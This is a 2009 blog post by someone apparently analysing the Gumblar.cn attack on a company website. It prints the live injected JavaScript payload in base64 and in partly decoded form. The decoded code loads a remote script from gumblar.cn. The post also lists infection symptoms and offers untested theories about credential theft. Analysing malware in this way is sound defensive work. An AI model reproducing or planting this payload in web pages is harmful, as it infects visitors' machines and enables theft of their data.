Wednesday, May 13, 2009

Gumblar.cn - Iframe attack.. Site Block Part2

the script behind the attack..
this is the base64 encoded script

PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlv
bihKb0cpe3ZhciBIWmU9JyUnO2V2YWwodW5lc2NhcGUoKCd2YXJfMjBh
XzNkXzIyXzUzXzYzXzcyXzY5cHRFbl82N182OW5lXzIyXzJjYl8zZF8y
MlZlXzcyc2lvbihfMjkrXzIyXzJjXzZhXzNkXzIyXzIyXzJjdV8zZG5h
Xzc2aWdhdG9yXzJlXzc1c2VyQWdlbnRfM2JfNjlmKCh1XzJlaV82ZWRf
NjV4T2YoXzIyV182OW5fMjJfMjlfM2UwKV8yNl8yNih1XzJlXzY5bmRl
Xzc4XzRmZihfMjJOXzU0XzIwNl8yMilfM2MwKV8yNl8yNihfNjRvXzYz
Xzc1bWVudF8yZWNvXzZma182OWVfMmVpbmRfNjV4T2YoXzIybWlfNjVr
XzNkXzMxXzIyKV8zYzApXzI2XzI2KHR5cGVvXzY2XzI4enJ2enRzKV8y
MV8zZHR5cGVvZl8yOF8yMl80MV8yMikpKV83Yl83YXJ2el83NF83M18z
ZF8yMkFfMjJfM2JldmFsKF8yMmlmKF83N2luZF82ZndfMmVfMjIrYV8y
Yl8yMl8yOWpfM2RfNmFfMmJfMjIrYStfMjJNYWpvXzcyXzIyK182Mitf
NjErXzIyXzRkaW5fNmZfNzJfMjIrYithK18yMl80MnVpbGRfMjJfMmJi
K18yMl82YV8zYl8yMl8yOV8zYmRfNmZfNjNfNzVtXzY1bnRfMmV3cmlf
NzRlKF8yMl8zY183M2NyaXB0XzIwc3JjXzNkXzJmXzJmZ3VtYmxhcl8y
ZWNuXzJmcnNfNzNfMmZfM2ZpZF8zZF8yMitqK18yMl8zZV8zY181Y18y
ZnNjcl82OXB0XzNlXzIyKV8zYl83ZCcpLnJlcGxhY2UoSm9HLEhaZSkp
KX0pKC9fL2cpOwogLS0+PC9zY3JpcHQ+

decoded to

(function(JoG){var HZe='%';eval(unescape(('var_20a_3d_22
_53_63_72_69ptEn_67_69ne_22_2cb_3d_22Ve_72sion(_29+_22
_2c_6a_3d_22_22_2cu_3dna_76igator._75serAgent_3b_69f
((u.i_6ed_65xOf(_22W_69n_22_29_3e0)_26_26(u._69nde_78
_4ff(_22N_54_206_22)_3c0)_26_26(_64o_63_75ment.co_6fk
_69e.ind_65xOf(_22mi_65k_3d_31_22)_3c0)_26_26(typeo_66
_28zrvzts)_21_3dtypeof_28_22_41_22)))_7b_7arvzt_73_3d
_22A_22_3beval(_22if(_77ind_6fw._22+a_2b_22_29j_3d_6a
_2b_22+a+_22Majo_72_22+_62+_61+_22_4din_6f_72_22+b+a+_22
_42uild_22_2bb+_22_6a_3b_22_29_3bd_6f_63_75m_65nt.write(
_22_3c_73cript_20src_3d_2f_2fgumblar.cn_2frs_73_2f_3fid
_3d_22+j+_22_3e_3c_5c_2fscr_69pt_3e_22)_3b_7d').replace
(JoG,HZe)))})(/_/g);



and after using this table i made
_20 = space
_2e = .
_2f = /
_3c = <
_3d = =
_3e = >
_3f = ?
_61 = a
_62 = b
_63 = c
_64 = d
_65 = e
_66 = f
_67 = g
_68 = h
_69 = i
_6a = j
_6b = k
_6c = l
_6d = m
_6e = n
_6f = o
_70 = p
_71 = q
_72 = r
_73 = s
_74 = t
_75 = u
_76 = v
_77 = w

i have ended up with this code..

(function(JoG){var HZe='%';eval(unescape(('var a=_22_53criptEngine_22_2cb=_22Version(_29+_22_2cj=_22_22
_2cu=navigator.userAgent_3bif((u.indexOf(_22Win_22_29>0)
_26_26(u.index_4ff(_22N_54 6_22)_3c0)_26_26(document.cookie.indexOf(_22miek=_31_22)
_3c0)_26_26(typeof_28zrvzts)_21=typeof_28_22_41_22)))_7b
_7arvzts=_22A_22_3beval(_22if(window._22+a_2b_22_29j=j_2b
_22+a+_22Major_22+b+a+_22_4dinor_22+b+a+_22_42uild_22_2bb+
_22j_3b_22_29_3bdocument.write(_22_3cscript src=//gumblar.cn/rss/?id=
_22+j+_22>_3c_5c/script>_22)_3b_7d').replace(JoG,HZe)))})(/_/g);

damn.. still not yet done with it but make sense now..

i'll update this again after a few hours or so.. anyone feel free to pm me for inquiries..

thanks for reading

Gumblar.cn - Iframe attack.. Site Block

I had been up this exploit for days now. and it seemed like a solution is still not yet figured out on how to stop this menace. Although work arounds are available most of them are just temporary solution to the big problem.

It all started when a website (a website made by our company) had been injected by encrypted javascripts out of no where. There is a simple pattern how this exploit works.

First indication is that a javascript that just pop out of no where in the head section of the webpage and another in the bottom of the body section.

Your site is likely to have a script that fetch infromation from GUMBLAR.CN using a javascript like gumblar.cn/rss?=1, i can't remember the whole pattern but it is somewhat like that.

Another symptom is that the acrobat reader will open when you have visited an infected site.

Try also looking at your image folder. It also does upload itself a image.php in image folders and an include.php, i still don't know what these files do but the image.php is in base encode 64.

Another thing is that all your javascript file had been injected with malicious functions in the bottom of the file.

How the exploit is done..
Though this are only theories, i think that this exploit make use of the vulnerability of the acrobat reader to pass in a worm at your system that gather information about the user (username,passwords,credit card account, etc.), so better patch up those antivirus and spyware to act against this exploit. I suggest users to try malwarebytes to clean up your system.

I'll go back to work now. I'll continue this later for the work around. Thank you for reading.